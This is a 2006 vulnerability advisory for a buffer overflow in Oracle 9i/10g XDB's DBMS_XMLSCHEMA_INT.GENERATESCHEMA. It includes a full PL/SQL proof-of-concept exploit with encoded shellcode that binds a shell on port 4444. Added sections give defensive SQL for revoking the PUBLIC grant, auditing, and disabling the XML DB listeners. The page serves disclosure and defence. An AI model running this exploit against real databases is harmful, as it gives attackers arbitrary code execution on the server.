Buffer Overflow in XDB DBMS_XMLSCHEMA_INT in Oracle 9i and 10g Rel 1

Name: DBMS_XMLSCHEMA in Oracle 9i and 10g Rel 1
Systems Affected: Oracle 9i Rel. 2 - 10g Rel. 1
Severity: High Risk
Category: Buffer Overflow
Vendor URL: http://www.oracle.com/
Credit: Ariel Matias Sanchez
Exploit: Argeniss Security Advisory
Date: 27 January 2006 (V 1.00)


Details

Oracle Database Server ships the DBMS_XMLSCHEMA_INT package, which contains procedures for registering and deleting XML schemas.
The public procedures GENERATESCHEMA and GENERATESCHEMAS in this package are vulnerable to a buffer overflow.

By default, EXECUTE on XDB.DBMS_XMLSCHEMA_INT is granted to PUBLIC, so any Oracle database user can exploit this vulnerability.
Successful exploitation allows an attacker to execute arbitrary code with the privileges of the Oracle server process.
It can also be used to cause a denial of service (DoS) by crashing the Oracle server process.


Example
/*
   Advisory: http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
   Oracle version: 10g Release 1
   Platform: Linux
   Shellcode opens a shell on port 4444 from www.metasploit.com.
*/

DECLARE a SYS.XMLTYPE; -- return value
AAA VARCHAR2(32767);
AA VARCHAR2(32767);
BBB VARCHAR2(32767);
JMP VARCHAR2(32767);
RET VARCHAR2(32767);
RETT VARCHAR2(32767);
SHELLCODE VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA;
JMP := 'BB' ||chr(235) || chr(09);
RETT:= chr(138) || chr(153) || chr(255) ||chr(191); 
RET:= chr(219) || chr(176) || chr(10) ||chr(08); 
SHELLCODE :=chr(41)||chr(201)||chr(219)||chr(201)||chr(177)||chr(22)||chr(184)||chr(37)
||chr(84)||chr(39)||chr(117)||chr(217)||chr(116)||chr(36)||chr(244)||chr(95)
||chr(131)||chr(199)||chr(4)||chr(49)||chr(71)||chr(17)||chr(3)||chr(98)
||chr(69)||chr(197)||chr(128)||chr(93)||chr(190)||chr(90)||chr(40)||chr(206)
||chr(42)||chr(95)||chr(196)||chr(150)||chr(242)||chr(198)||chr(145)||chr(183)
||chr(206)||chr(121)||chr(55)||chr(116)||chr(131)||chr(31)||chr(80)||chr(107)
||chr(127)||chr(134)||chr(243)||chr(2)||chr(158)||chr(44)||chr(146)||chr(76)
||chr(49)||chr(224)||chr(12)||chr(229)||chr(80)||chr(207)||chr(49)||chr(69)
||chr(244)||chr(1)||chr(210)||chr(104)||chr(121)||chr(243)||chr(71)||chr(36)
||chr(57)||chr(125)||chr(134)||chr(120)||chr(219)||chr(176)||chr(201)||chr(235)
||chr(78)||chr(73)||chr(147)||chr(187)||chr(176)||chr(128)||chr(163)||chr(242)
||chr(183)||chr(227)||chr(20)||chr(15)||chr(26)||chr(124)||chr(122)||chr(32)
||chr(233)||chr(20)||chr(236)||chr(17)||chr(111)||chr(140)||chr(130)||chr(228)
||chr(140)||chr(28)||chr(8)||chr(127)||chr(179)||chr(108)||chr(46);
BBB:= JMP || RET ||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
||SHELLCODE||'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB';
AA := AAA || BBB;
a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA (SCHEMANAME => AA, TYPENAME => 'longstring', ELEMENTNAME => '', 
RECURSE => FALSE, ANNOTATE => FALSE, EMBEDCOLL => FALSE);
END;



Workaround
Revoke the EXECUTE privilege on XDB.DBMS_XMLSCHEMA_INT from PUBLIC.
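The following SQL is an added example and is not part of the original advisory. It shows how a DBA can verify whether PUBLIC still holds EXECUTE on the package, apply the revoke, confirm it took effect, and audit any remaining calls so that attempts to reach GENERATESCHEMA/GENERATESCHEMAS are visible in the audit trail. It assumes a session with DBA privileges on Oracle 9i Rel. 2 or 10g Rel. 1 and that the AUDIT_TRAIL initialization parameter is set to DB.

```sql
-- Added example (not from the original advisory).
-- Assumes a DBA-privileged session (e.g. SYS) and AUDIT_TRAIL=DB.

-- 1. Who can execute the vulnerable package? On an unpatched default
--    installation this returns a row with GRANTEE = 'PUBLIC'.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'XDB'
   AND table_name = 'DBMS_XMLSCHEMA_INT';

-- 2. Workaround from the advisory: remove the PUBLIC grant.
REVOKE EXECUTE ON xdb.dbms_xmlschema_int FROM PUBLIC;

-- 3. Confirm the revoke: this query should now return no rows.
SELECT grantee
  FROM dba_tab_privs
 WHERE owner = 'XDB'
   AND table_name = 'DBMS_XMLSCHEMA_INT'
   AND grantee = 'PUBLIC';

-- 4. Detection: record every execution of the package by any remaining
--    grantee (object-level auditing, one record per call).
AUDIT EXECUTE ON xdb.dbms_xmlschema_int BY ACCESS;

-- 5. Review the trail: who called the package, from where, and whether
--    the call succeeded (RETURNCODE = 0) or failed.
SELECT timestamp, username, os_username, userhost, action_name, returncode
  FROM dba_audit_trail
 WHERE owner = 'XDB'
   AND obj_name = 'DBMS_XMLSCHEMA_INT'
 ORDER BY timestamp DESC;
```

If an application legitimately registers XML schemas through this package, grant EXECUTE to that application's schema owner explicitly rather than restoring the PUBLIC grant, and re-run step 3 after any Oracle upgrade or patch, since a re-install of the XDB component can re-create the default grant.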


Patch Information
Apply Oracle Critical Patch Update from January 2006 or later.




© 2005 by Red-Database-Security GmbH - last update 27-jan-2006

XMLDB

Oracle XML DB is a feature of the Oracle Database. It provides a high-performance, native XML storage and retrieval technology. It fully absorbs the W3C XML data model into the Oracle Database, and provides new standard access methods for navigating and querying XML. With Oracle XML DB, you get all the advantages of relational database technology plus the advantages of XML.

Oracle XML DB is available since Oracle 9i Release 2.

Oracle installs an HTTP and an FTP listener inside the database, running on ports 8080 and 2100 respectively.

Since Oracle 10g Rel. 2 an HTTPS listener is also available.
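As an added example (not from the original page), the following SQL shows how to check which XML DB protocol listeners are configured on an instance and how to disable them when the database does not need them. It assumes Oracle 10g with XML DB installed and a session permitted to execute DBMS_XDB; a port value of 0 means the corresponding listener is disabled.

```sql
-- Added example (not from the original page). Assumes Oracle 10g with
-- XML DB installed and EXECUTE on DBMS_XDB (e.g. a DBA session).

-- 1. Current listener ports. The defaults described above are 8080 (HTTP)
--    and 2100 (FTP); 0 means the protocol server is switched off.
SELECT dbms_xdb.gethttpport() AS http_port,
       dbms_xdb.getftpport()  AS ftp_port
  FROM dual;

-- 2. If no application uses the XML DB HTTP/FTP interfaces, disable them
--    so the database does not expose an extra network service.
BEGIN
  dbms_xdb.sethttpport(0);
  dbms_xdb.setftpport(0);
END;
/

-- 3. Verify: both columns should now read 0.
SELECT dbms_xdb.gethttpport() AS http_port,
       dbms_xdb.getftpport()  AS ftp_port
  FROM dual;
```

Disabling the listeners affects every application that reaches the database over the XML DB HTTP or FTP interfaces (for example WebDAV clients), so confirm with the application owners before changing the ports in production.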